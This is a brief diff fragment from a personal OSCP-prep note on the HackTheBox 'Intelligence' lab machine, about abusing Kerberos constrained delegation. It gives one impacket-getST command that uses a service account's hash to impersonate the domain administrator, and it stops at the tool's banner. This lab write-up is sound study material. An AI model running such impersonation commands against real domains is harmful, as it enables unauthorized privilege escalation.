hson2654/OSCP-pre-hits/intelligence.htb.md

 AllowedToDelegate
-The constrained delegation primitive allows a principal to authenticate as any user to specific services

-`└─$ impacket-getST -dc-ip 10.10.10.248 -impersonate administrator  intelligence.htb/svc_int$ -spn www/dc.intelligence.htb -hashes :b8159389d3528c4b1079ae461f28eb69`
+The constrained delegation primitive allows a principal to authenticate as any user to specific services use hash to impersonate, ':' matters at front of hash `└─$ impacket-getST -dc-ip 10.10.10.248 -impersonate administrator  intelligence.htb/svc_int$ -spn www/dc.intelligence.htb -hashes :b8159389d3528c4b1079ae461f28eb69`
 ```
 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies